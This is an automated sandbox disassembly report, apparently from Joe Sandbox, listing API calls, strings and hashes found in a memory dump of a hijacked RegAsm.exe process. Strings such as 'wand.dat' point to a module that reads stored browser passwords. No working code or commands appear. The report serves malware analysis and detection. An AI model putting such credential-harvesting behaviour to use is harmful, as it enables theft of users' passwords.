                                                                                                                          • String ID: MS Sans Serif
                                                                                                                          • API String ID: 210187428-168460110
                                                                                                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                          • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                          • memcmp.MSVCRT ref: 0041D8CB
                                                                                                                          • memcmp.MSVCRT ref: 0041D913
                                                                                                                          • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3384217055-0
                                                                                                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                          • API String ID: 2618321458-1828844352
                                                                                                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3550944819-0
                                                                                                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                          APIs
                                                                                                                          • free.MSVCRT ref: 0040F561
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$free
                                                                                                                          • String ID: g4@
                                                                                                                          • API String ID: 2888793982-2133833424
                                                                                                                          • Opcode ID: 736b2a0850d57b1886aaef609728f86ad4ae4702e86aed8cee47d08aa5f40c62
                                                                                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                          • Opcode Fuzzy Hash: 736b2a0850d57b1886aaef609728f86ad4ae4702e86aed8cee47d08aa5f40c62
                                                                                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                          • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1127616056-0
                                                                                                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                          APIs
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                          • free.MSVCRT ref: 0041747F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2605342592-0
                                                                                                                          • Opcode ID: 53c249c4ed26904e3077c8c6e0d5a5fb1c5dae0b3f1e23511c3111531268d4c8
                                                                                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                          • Opcode Fuzzy Hash: 53c249c4ed26904e3077c8c6e0d5a5fb1c5dae0b3f1e23511c3111531268d4c8
                                                                                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2678498856-0
                                                                                                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2754987064-0
                                                                                                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040F6E2
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                          • strlen.MSVCRT ref: 0040F70D
                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2754987064-0
                                                                                                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy$CloseHandle
                                                                                                                          • String ID: General
                                                                                                                          • API String ID: 3722638380-26480598
                                                                                                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 764393265-0
                                                                                                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                          APIs
                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$System$File$LocalSpecific
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 979780441-0
                                                                                                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                          • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1386444988-0
                                                                                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                          APIs
                                                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                          • String ID: "
                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                          APIs
                                                                                                                          • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                          • String ID: %2.2X
                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintf
                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendmemset
                                                                                                                          • String ID: F^@
                                                                                                                          • API String ID: 568519121-3652327722
                                                                                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PlacementWindowmemset
                                                                                                                          • String ID: WinPos
                                                                                                                          • API String ID: 4036792311-2823255486
                                                                                                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                          • String ID: r!A
                                                                                                                          • API String ID: 1103273653-628097481
                                                                                                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                          • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                          • memset.MSVCRT ref: 0042BAAE
                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 438689982-0
                                                                                                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1860491036-0
